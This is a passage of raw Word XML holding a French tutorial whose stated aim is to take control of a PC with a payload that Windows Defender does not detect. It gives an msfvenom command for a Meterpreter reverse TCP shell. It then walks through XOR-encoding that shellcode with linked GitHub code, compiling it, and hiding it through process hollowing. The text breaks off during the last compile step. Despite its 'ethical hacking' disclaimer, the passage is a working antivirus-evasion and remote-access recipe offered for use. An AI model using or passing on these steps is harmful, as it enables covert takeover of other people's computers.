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9906" w14:textId="2F8FBEAD" w:rsidR="00836727" w:rsidRDefault="00836727">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4D8177C5" wp14:editId="3453F107">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-459740</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>162</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="872884" cy="776378"/>
            <wp:effectExtent l="0" t="0" r="3810" b="508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84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3AB75B2" wp14:editId="2DBBB2CA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>5333604</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2540</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="872884" cy="776378"/>
            <wp:effectExtent l="0" t="0" r="3810" b="508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84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A9001" w14:textId="4B1D452B" w:rsidR="00300238" w:rsidRDefault="00836727" w:rsidP="00836727">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>DISCLAIMER : JE NE SUIS EN AUCUN CAS RESPONSABLE DE L’UTILISATION QUE VOUS ALLEZ FAIRE D</w:t>
      </w:r>
      <w:r w:rsidR="00A8290F">
        <w:t>E CE SAVOIR</w:t>
      </w:r>
      <w:r w:rsidR="00CC12A1">
        <w:t xml:space="preserve">. UNIQUEMENT POUR </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00CC12A1">
        <w:t>DU HACKING ETIQUE</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="32E8BE2A" w14:textId="77777777" w:rsidR="00836727" w:rsidRDefault="00836727"/>
    <w:p w14:paraId="560AC0D3" w14:textId="77777777" w:rsidR="00836727" w:rsidRDefault="00836727"/>
    <w:p w14:paraId="1A1C5B5D" w14:textId="25D42135" w:rsidR="00DA44B7" w:rsidRDefault="00DA44B7">
      <w:r>
        <w:t xml:space="preserve">Le but de ces recherches a été de prendre le contrôle d’un PC via un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> indétectable par Windows defender de façon simple.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D2A6F1" w14:textId="391A4F58" w:rsidR="00DA44B7" w:rsidRDefault="00DA44B7">
      <w:r>
        <w:t>Avec une connaissance des outils, nous pouvons facilement arriver à cela en 15 minutes montres en main (voir vidéo) et avec un peu d’entrainement, moins de 10 minutes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4162C4D3" w14:textId="0525B509" w:rsidR="00DA44B7" w:rsidRDefault="00DA44B7"/>
    <w:p w14:paraId="129EE0B5" w14:textId="25E35B9D" w:rsidR="00DA44B7" w:rsidRDefault="00DA44B7">
      <w:r>
        <w:t>Prérequis :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1197ADAB" w14:textId="1965802E" w:rsidR="00DA44B7" w:rsidRDefault="00DA44B7" w:rsidP="00DA44B7">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA44B7">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Visual studio </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DA44B7">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Code </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="006A65A6">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>https://code.visualstudio.com/download</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5FDF952E" w14:textId="72C1E087" w:rsidR="00DA44B7" w:rsidRDefault="00DA44B7" w:rsidP="00DA44B7">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA44B7">
        <w:t xml:space="preserve">Plateforme </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA44B7">
        <w:t>Dotnet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA44B7">
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="006A65A6">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>https://dotnet.microsoft.com/en-us/download/dotnet/7.0</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="118ABEE3" w14:textId="51779FBD" w:rsidR="00DA44B7" w:rsidRDefault="00DA44B7" w:rsidP="00DA44B7">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kali linux (avec </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>):</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:anchor="kali-platforms" w:history="1">
        <w:r w:rsidRPr="006A65A6">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>https://www.kali.org/get-kali/#kali-platforms</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="46F5D97A" w14:textId="72C6FAD2" w:rsidR="00DA44B7" w:rsidRDefault="00DA44B7" w:rsidP="00DA44B7">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56913FA0" w14:textId="386F7EDC" w:rsidR="00DA44B7" w:rsidRDefault="00DA44B7" w:rsidP="00DA44B7"/>
    <w:p w14:paraId="2862A194" w14:textId="4A345655" w:rsidR="00DA44B7" w:rsidRDefault="00DA44B7" w:rsidP="00AB1670">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Etape 1 : création du </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> de base :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E0CBBA" w14:textId="4EF47809" w:rsidR="00DA44B7" w:rsidRDefault="00DA44B7" w:rsidP="00DA44B7"/>
    <w:p w14:paraId="13ADC677" w14:textId="16E8E3B7" w:rsidR="00DA44B7" w:rsidRDefault="00DA44B7" w:rsidP="00DA44B7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43776228" wp14:editId="0A165C8B">
            <wp:extent cx="5760720" cy="329438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4A0C" w14:textId="7956F825" w:rsidR="00DA44B7" w:rsidRDefault="00DA44B7" w:rsidP="00DA44B7">
      <w:r>
        <w:t xml:space="preserve">Pour ce faire, utilisez cette commande </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> en changeant l’attribut LHOST en fonction de l’IP de votre Kali lin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4B7" w:rsidRPr="00EF7949" w14:paraId="7AE14966" w14:textId="77777777" w:rsidTr="00DA44B7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3EF5E865" w14:textId="6DE124D4" w:rsidR="00DA44B7" w:rsidRPr="00DA44B7" w:rsidRDefault="00DA44B7" w:rsidP="00DA44B7">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DA44B7">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>msfvenom</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00DA44B7">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve"> -p windows/x64/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DA44B7">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>meterpreter</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00DA44B7">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DA44B7">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>reverse_tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00DA44B7">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve"> LHOST=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>192.168.1.101</w:t>
            </w:r>
            <w:r w:rsidRPr="00DA44B7">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve"> LPORT=8080 EXITFUNC=thread -f </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DA44B7">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>csharp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="58717969" w14:textId="6FE41781" w:rsidR="007A063D" w:rsidRPr="00CC6D6B" w:rsidRDefault="007A063D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02B265BA" w14:textId="1DC6387B" w:rsidR="00DA44B7" w:rsidRDefault="00DA44B7" w:rsidP="00DA44B7">
      <w:r w:rsidRPr="00DA44B7">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Une suite de caractères </w:t>
      </w:r>
      <w:r w:rsidR="007A063D" w:rsidRPr="00DA44B7">
        <w:t>hexadécimaux</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA44B7">
        <w:t xml:space="preserve"> s</w:t>
      </w:r>
      <w:r>
        <w:t>era générée. Sauvegardée la dans un fichier par sécurité.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4195756A" w14:textId="697831E0" w:rsidR="007A063D" w:rsidRDefault="007A063D" w:rsidP="007A063D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56FC55F1" wp14:editId="65E3A685">
            <wp:extent cx="2740709" cy="4149306"/>
            <wp:effectExtent l="0" t="0" r="254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634" cy="41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5E5A" w14:textId="0E7A2940" w:rsidR="007A063D" w:rsidRDefault="007A063D" w:rsidP="00AB1670">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Etape 2 : générez un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> avec une fonction XOR (décompression à l’ouverture)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8D3677" w14:textId="77777777" w:rsidR="00AB1670" w:rsidRPr="00AB1670" w:rsidRDefault="00AB1670" w:rsidP="00AB1670"/>
    <w:p w14:paraId="1AB9C94C" w14:textId="64D43C06" w:rsidR="007A063D" w:rsidRDefault="007A063D" w:rsidP="007A063D">
      <w:r>
        <w:t xml:space="preserve">Cette étape sert à camoufler le fichier pour ne pas qu’il soit détectable en tant que </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> lorsqu’il n’est pas exécuté.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0F8DE4" w14:textId="0E1DA69E" w:rsidR="007A063D" w:rsidRDefault="007A063D" w:rsidP="007A063D">
      <w:r>
        <w:t xml:space="preserve">Nous allons utiliser le script d’un hacker étique présent sur </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228DA91B" w14:textId="4B16064D" w:rsidR="007A063D" w:rsidRDefault="00236C4C" w:rsidP="007A063D">
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidR="007A063D" w:rsidRPr="006A65A6">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>https://github.com/chvancooten/OSEP-Code-Snippets/blob/main/XOR%20Shellcode%20Encoder/Program.cs</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="70486A8C" w14:textId="77777777" w:rsidR="007A063D" w:rsidRDefault="007A063D">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FA5E3B" w14:textId="53888A7D" w:rsidR="007A063D" w:rsidRDefault="007A063D" w:rsidP="007A063D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Pour ce faire, créez un dossier vide « </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>XorCoder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> » et ouvre le dossier avec </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>visual</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> studio code, ouvrez un terminal</w:t>
      </w:r>
      <w:r w:rsidR="00AB1670">
        <w:t xml:space="preserve"> VSC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dans celui-ci et entrez la commande de base : « </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A063D">
        <w:t>dotnet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A063D">
        <w:t xml:space="preserve"> new console</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> »</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DE3698" w14:textId="7BACAA02" w:rsidR="007A063D" w:rsidRDefault="007A063D" w:rsidP="007A063D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DE600FA" wp14:editId="4AF7DBAC">
            <wp:extent cx="5760720" cy="67837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1573" w14:textId="535AA708" w:rsidR="00AB1670" w:rsidRDefault="00AB1670" w:rsidP="007A063D"/>
    <w:p w14:paraId="57C6B7F8" w14:textId="4575AABE" w:rsidR="00AB1670" w:rsidRDefault="00AB1670" w:rsidP="007A063D">
      <w:r>
        <w:t>Des fichiers de base vont se créer, il faudra modifier le « </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>program.cs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t> »</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E24165C" w14:textId="08B37028" w:rsidR="00AB1670" w:rsidRDefault="00AB1670" w:rsidP="007A063D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F8AB618" wp14:editId="177894C2">
            <wp:extent cx="2009775" cy="8858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F91D" w14:textId="1916109F" w:rsidR="00AB1670" w:rsidRDefault="00AB1670" w:rsidP="007A063D">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Prenez le code de la page </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> et remplacez le code </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hexadecimal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> de base par le </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>votre</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> généré précédemment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E885955" w14:textId="294BFE8A" w:rsidR="00AB1670" w:rsidRDefault="00AB1670" w:rsidP="007A063D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5753C487" wp14:editId="35C3882D">
            <wp:extent cx="5760720" cy="572706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C5F4" w14:textId="00B7613F" w:rsidR="00AB1670" w:rsidRDefault="00AB1670" w:rsidP="007A063D"/>
    <w:p w14:paraId="161A5D78" w14:textId="59CD58F1" w:rsidR="00AB1670" w:rsidRDefault="00AB1670" w:rsidP="007A063D">
      <w:r>
        <w:t xml:space="preserve">Une fois le code remplacé, </w:t>
      </w:r>
      <w:r w:rsidR="00A05A0E">
        <w:t xml:space="preserve">pour compiler l’application, </w:t>
      </w:r>
      <w:r>
        <w:t>entrez dans le terminal de VSC la comman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670" w:rsidRPr="00EF7949" w14:paraId="2B6D5A37" w14:textId="77777777" w:rsidTr="00AB1670">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46B1BB5B" w14:textId="308A4D68" w:rsidR="00AB1670" w:rsidRPr="00AB1670" w:rsidRDefault="00AB1670" w:rsidP="00AB1670">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="4972"/>
              </w:tabs>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AB1670">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>dotnet publish -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00AB1670">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>p:PublishSingleFile</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00AB1670">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>=true -r win-x64 -c Release --self-contained true -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AB1670">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>p:PublishTrimmed</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AB1670">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>=true</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="017E9003" w14:textId="77777777" w:rsidR="00AB1670" w:rsidRPr="00AB1670" w:rsidRDefault="00AB1670" w:rsidP="007A063D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A0786E3" w14:textId="77777777" w:rsidR="00AB1670" w:rsidRPr="00CC6D6B" w:rsidRDefault="00AB1670">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC6D6B">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="354C5952" w14:textId="6DFDBB4E" w:rsidR="00AB1670" w:rsidRDefault="00AB1670" w:rsidP="007A063D">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB1670">
        <w:lastRenderedPageBreak/>
        <w:t>Recupéréz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB1670">
        <w:t xml:space="preserve"> le chemin des fichiers </w:t>
      </w:r>
      <w:r>
        <w:t>« .exe » :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE5F70D" w14:textId="676F789A" w:rsidR="00AB1670" w:rsidRDefault="00AB1670" w:rsidP="007A063D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52563706" wp14:editId="5089BB3E">
            <wp:extent cx="5514975" cy="12287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9213" w14:textId="20515F50" w:rsidR="00AB1670" w:rsidRDefault="00AB1670" w:rsidP="007A063D"/>
    <w:p w14:paraId="7B0999CA" w14:textId="77777777" w:rsidR="00AB1670" w:rsidRDefault="00AB1670" w:rsidP="00AB1670">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:r>
        <w:t>Etape 3 : Camoufler le dans un processus en attente</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0204F7" w14:textId="77777777" w:rsidR="00AB1670" w:rsidRDefault="00AB1670" w:rsidP="00AB1670">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CC248BE" w14:textId="767BD351" w:rsidR="00AB1670" w:rsidRDefault="00AB1670" w:rsidP="00AB1670">
      <w:r>
        <w:t xml:space="preserve">Pour cette </w:t>
      </w:r>
      <w:r w:rsidR="003C2F17">
        <w:t>étape</w:t>
      </w:r>
      <w:r>
        <w:t>, la procédure est la même que la précédente</w:t>
      </w:r>
      <w:r w:rsidR="003C2F17">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sauf que cette fois si, le code à rentrer dans </w:t>
      </w:r>
      <w:r w:rsidR="003C2F17">
        <w:t xml:space="preserve">le script </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003C2F17">
        <w:t>github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003C2F17">
        <w:t xml:space="preserve"> est le résultat de l’exécution du précédent « .exe » généré.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF7A995" w14:textId="037FEFEA" w:rsidR="003C2F17" w:rsidRDefault="003C2F17" w:rsidP="00AB1670">
      <w:r>
        <w:t>Prenez donc le lien généré juste auparavant et exécutez le fichier « XorCoder.exe » dans un terminal PowerShell. Un nouveau code devrait être généré, sauvegardez-le dans un fichier texte.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB6C298" w14:textId="5BE5BE4A" w:rsidR="003C2F17" w:rsidRDefault="003C2F17" w:rsidP="00AB1670">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5088BE24" wp14:editId="28F339FB">
            <wp:extent cx="5381625" cy="45624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4CB8" w14:textId="6E068F91" w:rsidR="003C2F17" w:rsidRDefault="003C2F17" w:rsidP="00AB1670">
      <w:r>
        <w:t>Créez un nouveau dossier, cette fois-ci « handler », et ouvrez-le avec Visual studio Code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C00F2B" w14:textId="7FBC997C" w:rsidR="003C2F17" w:rsidRDefault="003C2F17" w:rsidP="00AB1670">
      <w:r>
        <w:t xml:space="preserve">Avec le même principe que l’autre script, ouvrez-le terminal de Visual studio Code et entrez la commande pour générer les fichiers de base : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A063D">
        <w:t>dotnet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A063D">
        <w:t xml:space="preserve"> new console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01592E39" w14:textId="09286893" w:rsidR="003C2F17" w:rsidRDefault="003C2F17" w:rsidP="00AB1670">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Modifiez </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>program.cs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> et mettez le contenu de ce script :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C9D7B1" w14:textId="0BD20760" w:rsidR="003C2F17" w:rsidRDefault="00236C4C" w:rsidP="00AB1670">
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidR="003C2F17" w:rsidRPr="006A65A6">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>https://github.com/chvancooten/OSEP-Code-Snippets/blob/main/Shellcode%20Process%20Hollowing/Program.cs</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="23AC8FEA" w14:textId="2D7C890C" w:rsidR="003C2F17" w:rsidRDefault="003C2F17" w:rsidP="00AB1670"/>
    <w:p w14:paraId="1DA256F8" w14:textId="79946181" w:rsidR="003C2F17" w:rsidRDefault="003C2F17" w:rsidP="00AB1670">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D59C678" wp14:editId="7B230E7D">
            <wp:extent cx="5760720" cy="34861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117" w14:textId="2E9B1643" w:rsidR="003C2F17" w:rsidRDefault="003C2F17" w:rsidP="00AB1670"/>
    <w:p w14:paraId="0EB1D392" w14:textId="466E18BA" w:rsidR="003C2F17" w:rsidRDefault="003C2F17" w:rsidP="00AB1670">
      <w:r>
        <w:t>Vous pouvez maintenant compiler le code </w:t>
      </w:r>
      <w:r w:rsidR="00A05A0E">
        <w:t xml:space="preserve">avec la commande </w:t>
      </w:r>
      <w:r>
        <w:t>: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05A0E" w:rsidRPr="00EF7949" w14:paraId="13D475B7" w14:textId="77777777" w:rsidTr="00A05A0E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A8765DA" w14:textId="175DF35C" w:rsidR="00A05A0E" w:rsidRDefault="00A05A0E" w:rsidP="00A05A0E">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AB1670">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>dotnet publish -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00AB1670">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>p:PublishSingleFile</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00AB1670">
